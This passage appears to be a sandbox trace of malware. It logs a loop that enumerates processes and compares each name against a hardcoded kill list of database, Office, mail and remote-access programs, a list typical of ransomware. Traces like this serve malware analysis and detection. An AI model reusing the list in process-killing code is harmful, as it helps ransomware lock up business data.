Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, 
Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.852] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0112.853] lstrcmpiW (lpString1="centralcreditcard.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") 
returned -1 [0112.853] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x918, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0112.854] lstrcmpiW (lpString1="creditservice.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.854] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x928, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0112.856] lstrcmpiW (lpString1="edcsvr.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, 
sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.856] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0112.857] lstrcmpiW (lpString1="fpos.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, 
steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.857] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0112.858] lstrcmpiW (lpString1="isspos.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, 
TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.858] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0112.859] lstrcmpiW (lpString1="mxslipstream.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.859] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0112.868] lstrcmpiW (lpString1="omnipos.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.868] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x978, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0112.871] lstrcmpiW (lpString1="spcwin.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, 
mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.871] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0112.872] lstrcmpiW (lpString1="spgagentservice.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, 
sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.872] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x998, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0112.873] lstrcmpiW (lpString1="utg2.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, 
MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.873] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="requested.exe")) returned 1 [0112.874] lstrcmpiW (lpString1="requested.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.874] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, 
pcPriClassBase=8, dwFlags=0x0, szExeFile="believe.exe")) returned 1 [0112.875] lstrcmpiW (lpString1="believe.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.875] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="jacksonville.exe")) returned 1 [0112.876] lstrcmpiW (lpString1="jacksonville.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, 
tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.877] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0112.877] lstrcmpiW (lpString1="WmiPrvSE.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, 
chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.878] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0112.879] lstrcmpiW (lpString1="WmiPrvSE.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, 